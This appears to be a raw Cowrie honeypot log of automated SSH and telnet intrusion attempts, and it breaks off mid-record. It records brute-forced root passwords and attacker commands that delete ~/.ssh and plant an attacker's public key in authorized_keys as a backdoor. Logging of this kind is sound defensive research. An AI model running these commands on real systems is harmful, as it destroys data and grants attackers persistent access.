{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37078,"dst_ip":"1.2.3.4","dst_port":23,"session":"b054a9bc355d","protocol":"telnet","message":"New connection: 212.227.235.229:37078 (1.2.3.4:23) [session: b054a9bc355d]","sensor":"my-vps","timestamp":"2025-08-26T19:13:19.385354Z"}
{"eventid":"cowrie.session.closed","duration":13.653600692749023,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:33.038886Z","src_ip":"212.227.235.229","session":"b054a9bc355d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37394,"dst_ip":"1.2.3.4","dst_port":23,"session":"26a1d26d7136","protocol":"telnet","message":"New connection: 212.227.235.229:37394 (1.2.3.4:23) [session: 26a1d26d7136]","sensor":"my-vps","timestamp":"2025-08-26T19:13:33.208034Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36770,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ec4eb80e8d3","protocol":"ssh","message":"New connection: 212.227.235.229:36770 (1.2.3.4:22) [session: 2ec4eb80e8d3]","sensor":"my-vps","timestamp":"2025-08-26T19:13:41.510274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:13:41.511904Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:13:41.779542Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Kplm041@","message":"login attempt [root/Kplm041@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:13:42.905084Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:13:43.518688Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:13:43.519385Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:13:43.520190Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:43.791879Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:13:44.393613Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:13:44.394302Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:13:44.664979Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:44.665914Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37429,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbdd34a28ec2","protocol":"ssh","message":"New connection: 212.227.235.229:37429 (1.2.3.4:22) [session: bbdd34a28ec2]","sensor":"my-vps","timestamp":"2025-08-26T19:13:44.914266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:13:44.918013Z","src_ip":"212.227.235.229","session":"bbdd34a28ec2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:13:45.172496Z","src_ip":"212.227.235.229","session":"bbdd34a28ec2"}
{"eventid":"cowrie.session.closed","duration":12.629926443099976,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:45.837857Z","src_ip":"212.227.235.229","session":"26a1d26d7136"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37618,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed397e5b4bfb","protocol":"telnet","message":"New connection: 212.227.235.229:37618 (1.2.3.4:23) [session: ed397e5b4bfb]","sensor":"my-vps","timestamp":"2025-08-26T19:13:46.144343Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:13:46.182069Z","src_ip":"212.227.235.229","session":"bbdd34a28ec2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:47.436093Z","src_ip":"212.227.235.229","session":"bbdd34a28ec2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37994,"dst_ip":"1.2.3.4","dst_port":22,"session":"50a17c0c30b4","protocol":"ssh","message":"New connection: 212.227.235.229:37994 (1.2.3.4:22) [session: 50a17c0c30b4]","sensor":"my-vps","timestamp":"2025-08-26T19:13:47.683999Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:13:47.690356Z","src_ip":"212.227.235.229","session":"50a17c0c30b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:13:47.944729Z","src_ip":"212.227.235.229","session":"50a17c0c30b4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:13:48.958788Z","src_ip":"212.227.235.229","session":"50a17c0c30b4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:49.218066Z","src_ip":"212.227.235.229","session":"50a17c0c30b4"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:49.219069Z","src_ip":"212.227.235.229","session":"2ec4eb80e8d3"}
{"eventid":"cowrie.session.connect","src_ip":"121.146.234.215","src_port":39824,"dst_ip":"1.2.3.4","dst_port":23,"session":"1f1c2a66a07b","protocol":"telnet","message":"New connection: 121.146.234.215:39824 (1.2.3.4:23) [session: 1f1c2a66a07b]","sensor":"my-vps","timestamp":"2025-08-26T19:13:52.274632Z"}
{"eventid":"cowrie.session.closed","duration":12.983235120773315,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:13:59.127508Z","src_ip":"212.227.235.229","session":"ed397e5b4bfb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37834,"dst_ip":"1.2.3.4","dst_port":23,"session":"9f7e5b4edeef","protocol":"telnet","message":"New connection: 212.227.235.229:37834 (1.2.3.4:23) [session: 9f7e5b4edeef]","sensor":"my-vps","timestamp":"2025-08-26T19:13:59.484504Z"}
{"eventid":"cowrie.session.closed","duration":13.825000524520874,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:13.309428Z","src_ip":"212.227.235.229","session":"9f7e5b4edeef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38068,"dst_ip":"1.2.3.4","dst_port":23,"session":"e0a6869f4b77","protocol":"telnet","message":"New connection: 212.227.235.229:38068 (1.2.3.4:23) [session: e0a6869f4b77]","sensor":"my-vps","timestamp":"2025-08-26T19:14:13.495856Z"}
{"eventid":"cowrie.session.closed","duration":30.50432825088501,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:22.778891Z","src_ip":"121.146.234.215","session":"1f1c2a66a07b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58147,"dst_ip":"1.2.3.4","dst_port":22,"session":"7891c860eef0","protocol":"ssh","message":"New connection: 212.227.235.229:58147 (1.2.3.4:22) [session: 7891c860eef0]","sensor":"my-vps","timestamp":"2025-08-26T19:14:23.656913Z"}
{"eventid":"cowrie.session.closed","duration":13.461299896240234,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:26.957078Z","src_ip":"212.227.235.229","session":"e0a6869f4b77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38381,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c114c805a48","protocol":"telnet","message":"New connection: 212.227.235.229:38381 (1.2.3.4:23) [session: 6c114c805a48]","sensor":"my-vps","timestamp":"2025-08-26T19:14:27.216139Z"}
{"eventid":"cowrie.session.closed","duration":12.804334163665771,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:40.020406Z","src_ip":"212.227.235.229","session":"6c114c805a48"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38609,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7f70b7aee6e","protocol":"telnet","message":"New connection: 212.227.235.229:38609 (1.2.3.4:23) [session: d7f70b7aee6e]","sensor":"my-vps","timestamp":"2025-08-26T19:14:40.343139Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49466,"dst_ip":"1.2.3.4","dst_port":22,"session":"538752abfd29","protocol":"ssh","message":"New connection: 212.227.235.229:49466 (1.2.3.4:22) [session: 538752abfd29]","sensor":"my-vps","timestamp":"2025-08-26T19:14:52.731977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:14:52.732869Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:14:52.997845Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.closed","duration":13.718946695327759,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.062000Z","src_ip":"212.227.235.229","session":"d7f70b7aee6e"}
{"eventid":"cowrie.login.success","username":"root","password":"123@@@","message":"login attempt [root/123@@@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.097805Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38832,"dst_ip":"1.2.3.4","dst_port":23,"session":"81c1ae37d584","protocol":"telnet","message":"New connection: 212.227.235.229:38832 (1.2.3.4:23) [session: 81c1ae37d584]","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.246545Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:14:54.655509Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.656469Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.658064Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:54.932844Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:14:55.589849Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:14:55.590541Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:14:55.858085Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:55.858999Z","src_ip":"212.227.235.229","session":"538752abfd29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50172,"dst_ip":"1.2.3.4","dst_port":22,"session":"3928cfe8bbe1","protocol":"ssh","message":"New connection: 212.227.235.229:50172 (1.2.3.4:22) [session: 3928cfe8bbe1]","sensor":"my-vps","timestamp":"2025-08-26T19:14:56.121333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:14:56.124175Z","src_ip":"212.227.235.229","session":"3928cfe8bbe1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:14:56.390054Z","src_ip":"212.227.235.229","session":"3928cfe8bbe1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:14:57.445702Z","src_ip":"212.227.235.229","session":"3928cfe8bbe1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:14:58.718612Z","src_ip":"212.227.235.229","session":"3928cfe8bbe1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50725,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dde47c0365f","protocol":"ssh","message":"New connection: 212.227.235.229:50725 (1.2.3.4:22) [session: 8dde47c0365f]","sensor":"my-vps","timestamp":"2025-08-26T19:14:58.956941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:14:58.961951Z","src_ip":"212.227.235.229","session":"8dde47c0365f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha